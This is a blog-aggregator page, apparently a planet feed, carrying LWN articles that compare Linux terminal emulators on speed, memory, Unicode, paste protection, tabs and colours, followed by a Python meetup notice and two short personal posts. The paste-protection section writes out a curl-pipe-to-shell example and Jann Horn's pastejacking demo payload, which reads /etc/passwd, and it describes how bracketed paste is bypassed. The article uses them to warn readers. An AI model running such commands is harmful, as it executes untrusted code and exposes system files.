Here we can see rxvt and st are ahead of all others, closely followed by the much newer Alacritty, expressly designed for speed. Xfce (representing the VTE family) and Konsole are next, running at almost twice the time while xterm comes last, almost five times as slow as rxvt. During the test, xterm also had jitter in the display: it was difficult to see the actual text going by, even if it was always the same string. Konsole was fast, but it was cheating: the display would hang from time to time, showing a blank or partially drawn display. Other terminals generally display all lines faithfully, including st, Alacritty, and rxvt.

Dickey explains that performance variations are due to the design of scrollback buffers in the different terminals. Specifically, he blames the disparity on rxvt and other terminals "not following the same rules":

Unlike xterm, rxvt did not attempt to display all updates. If it fell behind, it would discard some of the updates, to catch up. Doing that had a greater effect on the apparent scrolling speed than its internal memory organization, since it was useful for any number of saved-lines. One drawback was that ASCII animations were somewhat erratic.

To fix this perceived slowness of xterm, Dickey introduced the fastScroll resource to allow xterm to drop some screen updates to catch up with the flow and, indeed, my tests confirm the resource improves performance to match rxvt. It is, however, a rather crude implementation as Dickey explains: "sometimes xterm — like konsole — appears to stop, since it is waiting for a new set of screen updates after having discarded some". In this case, it seems that other terminals found a better compromise between speed and display integrity.

Resource usage

Regardless of the worthiness of bandwidth as a performance metric, it does provide a way to simulate load on the terminals, which in turn allows us to measure other parameters like memory or disk usage. The metrics here were obtained by running the above seq benchmark under the supervision of a Python process that collected the results of getrusage() counters for ru_maxrss, the sum of ru_oublock and ru_inblock, and a simple timer for wall clock time.
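
The supervision script is not reproduced here, but the general shape of such a harness is easy to sketch in Python; the counter names match getrusage(), while the command line and output format below are made up for illustration:

import resource
import subprocess
import time

# Hypothetical example: run a benchmark inside a terminal and report
# memory, block I/O, and wall-clock time for the child processes.
cmd = ["xterm", "-e", "seq", "100000"]

start = time.monotonic()
subprocess.run(cmd, check=True)
elapsed = time.monotonic() - start

usage = resource.getrusage(resource.RUSAGE_CHILDREN)
print("max RSS (KiB):", usage.ru_maxrss)
print("block I/O (in + out):", usage.ru_inblock + usage.ru_oublock)
print("wall clock: %.2fs" % elapsed)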

St comes first in this benchmark with the smallest memory footprint, 8MB on average, which was no surprise considering the project's focus on simplicity. Slightly larger are mlterm, xterm, and rxvt at around 12MB. Another notable result is Alacritty, which takes a surprising amount of memory at 30MB. Next come the VTE family members, which vary between 40 and 60MB, a higher result that could be explained by those programs' use of higher-level libraries like GTK. Konsole comes last with a whopping 65MB of memory usage during the tests, although that might be excused due to its large feature set.

Compared with the results I had a decade ago, all programs take up much more memory. Xterm used to take 4MB of memory, but now takes 15MB just on startup. A similar increase also affects rxvt, which now takes 16MB of memory out of the box. The Xfce Terminal now takes 34MB, a three-fold increase, yet GNOME Terminal only takes 20MB on startup. Of course, the previous tests were done on a 32-bit architecture. At LCA 2012, Rusty Russell also explained there are many more subtle reasons that could explain such an increase. Besides, maybe this is something we can live with in this modern day and age of multi-gigabyte core memory sizes.

Yet I can't help but feel there's a waste of resources for something so fundamental as a terminal. Those programs should be the smallest of the small and should be able to run in a shoe box, when those eventually run Linux (you know they will). Yet with those numbers, memory usage would be a concern only when running multiple terminals in anything but the most limited of environments. To compensate, GNOME Terminal, Konsole, urxvt, Terminator, and Xfce Terminal feature a daemon mode that manages multiple terminals through a single process which limits the impact of their larger memory footprint.

Another result I have found surprising in my tests is actual disk I/O: I did not expect any, yet some terminals write voluminous amounts of data to disk. It turns out the VTE library actually writes the scrollback buffer to disk, a "feature" that was noticed back in 2010 and that is still present in modern implementations. At least the file contents are now encrypted with AES256 GCM since 0.39.2, but this raises the question of what's so special about the VTE library that it requires such an exotic approach.

Conclusion

In the previous article, we found that VTE-based terminals have a good feature set, yet here we see that this comes with some performance costs. Memory isn't a big issue since all VTE terminals are spawned from a single daemon process that limits memory usage. Old systems tight on core memory might still need older terminals with lower memory usage, however. While VTE terminals behave well in bandwidth tests, their latency is higher than the criterion set in the GNOME Human Interface Guidelines, which is probably something that the developers of the VTE library should look into. Considering how inevitable the terminal is even for novice users in Linux, those improvements might make the experience slightly less traumatic. For seasoned geeks, changing from the default terminal might even mean quality improvements and less injuries during long work sessions. Unfortunately, only the old xterm and mlterm get us to the magic 10ms range, which might involve unacceptable compromises for some.

The latency benchmarks also show there are serious tradeoffs that came with the introduction of compositors in Linux graphical environments. Some users might want to take a look at conventional window managers, since they provide significant latency improvements. Unfortunately, it was not possible to run latency tests in Wayland: the Typometer program does exactly the kind of things Wayland was designed to prevent, namely inject keystrokes and spy on other windows. Hopefully, Wayland compositors are better than X.org at performance and someone will come up with a way of benchmarking latency in those environments in the future.

This article first appeared in the Linux Weekly News.


A look at terminal emulators, part 1

Anarcat - jeu, 03/29/2018 - 19:00

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride at using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal        Debian         Fedora   Upstream  Notes
Alacritty       N/A            N/A      6debc4f   no releases, Git head
GNOME Terminal  3.22.2         3.26.2   3.28.0    uses GTK3, VTE
Konsole         16.12.0        17.12.2  17.12.3   uses KDE libraries
mlterm          3.5.0          3.7.0    3.8.5     uses VTE, "Multi-lingual terminal"
pterm           0.67           0.70     0.70      PuTTY without ssh, uses GTK2
st              0.6            0.7      0.8.1     "simple terminal"
Terminator      1.90+bzr-1705  1.91     1.91      uses GTK3, VTE
urxvt           9.22           9.22     9.22      main rxvt fork, also known as rxvt-unicode
Xfce Terminal   0.8.3          0.8.7    0.8.7.2   uses GTK3, VTE
xterm           327            330      331       the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

By default, xterm uses the classic "fixed" font which, according to Wikipedia, has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, but then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fallback across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.
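
Reproducing these checks takes nothing more than printing the test strings yourself; a correct terminal should render the Hebrew sample with the sin (ש) rightmost. A trivial Python sketch, using the same strings as above:

# Unicode coverage test: scripts from several writing systems.
print("é, Δ, Й, ק, م, ๗, あ, 叶, 葉, 말")
# Bi-directional test: "Sarah" in Hebrew should read right to left.
print("שרה")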

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command:

git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null; clear;
echo -n "Hello "; whoami|tr -d '\n';
echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \
Here'"'"'s the first line of your /etc/passwd: ';
head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.
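
To make the failure concrete: in bracketed paste mode the terminal is expected to wrap pasted text in the \e[200~ and \e[201~ markers and, crucially, to strip any end-of-paste marker already present in the clipboard. A small Python sketch of that sanitizing step (an illustration of the principle only, not code from any of the terminals reviewed):

PASTE_START = "\x1b[200~"
PASTE_END = "\x1b[201~"

def bracketed_paste(clipboard):
    # Remove any end-of-paste sequence hidden in the clipboard so the
    # pasted text cannot terminate the bracket early, then wrap it.
    sanitized = clipboard.replace(PASTE_END, "")
    return PASTE_START + sanitized + PASTE_END

evil = "harmless text\x1b[201~echo pwned\n"
print(repr(bracketed_paste(evil)))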

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.

Tabs and profiles

A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch to another tiling terminal, Tilix. I am personally happy with only an Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems, however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.

While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.
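
True color support is also easy to check by hand by emitting 24-bit SGR escape sequences directly; terminals with full support show a smooth gradient, while others approximate or mangle it. A small Python sketch of such a test, using the standard 38;2/48;2 color syntax:

import sys

# Print a horizontal gradient using 24-bit ("true color") background codes.
for col in range(80):
    r, g, b = 255 - col * 3, col * 3, 128
    sys.stdout.write("\x1b[48;2;%d;%d;%dm " % (r, g, b))
sys.stdout.write("\x1b[0m\n")  # reset attributes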

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.


Montréal-Python 70 - Atomic Zucchini

Montreal Python - mar, 03/27/2018 - 23:00

It is with pleasure that we announce the presentations of our 70th meetup. Unexpected events forced us to postpone last month's meetup. But don't worry, we are back in force with a menu full of python delights!

Thanks to Shopify for sponsoring this event by providing the venue and pizza!

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 7:30PM - Break
  • 7:45PM - Presentations
  • 9:00PM - End of the event
  • 9:15PM - Benelux
Presentations

SikuliX: automate everything you see with a single tool (Windows, Mac, Linux) - Dominik Seelos

SikuliX is an automation tool that lets you script repetitive tasks (in Python 2.7) with very, very little automation experience. SikuliX works through image recognition and can do anything a keyboard and mouse can do (Windows, Mac, and Linux).

Automate All The Things with Home Assistant - Philippe Gauthier

Would you pass a junior data scientist interview? - Nicolas Coallier

This talk demonstrates the Python modules and the level of Python skill needed to be hired as a junior data scientist at a company. We have an internal Python test that we give during interviews; I will walk through the test, which contains the answers.

Modules covered: Pandas, Numpy, Sklearn, BeautifulSoup, re... ML theory covered: classification, segmentation, LSTM, boosting. Other topics covered: scraping, NLP, data structures.

When

Monday, April 9th, 2018 at 6:00PM

Where

Shopify, 490 rue de la Gauchetière Montréal, Québec


Epic Lameness

Eric Dorland - lun, 09/01/2008 - 17:26
SF.net now supports OpenID. Hooray! I'd like to make a comment on a thread about the RTL8187se chip I've got in my new MSI Wind. So I go to sign in with OpenID and instead of signing me in it prompts me to create an account with a name, username and password for the account. Huh? I just want to post to their forum, I don't want to create an account (at least not explicitly, if they want to do it behind the scenes fine). Isn't the point of OpenID to not have to create accounts and particularly not have to create new usernames and passwords to access websites? I'm not impressed.

Sentiment Sharing

Eric Dorland - lun, 08/11/2008 - 23:28
Biella, I am from there and I do agree. If I was still living there I would try to form a team and make a bid. Simon even made noises about organizing a bid at DebConfs past. I wish he would :)

But a DebConf in New York would be almost as good.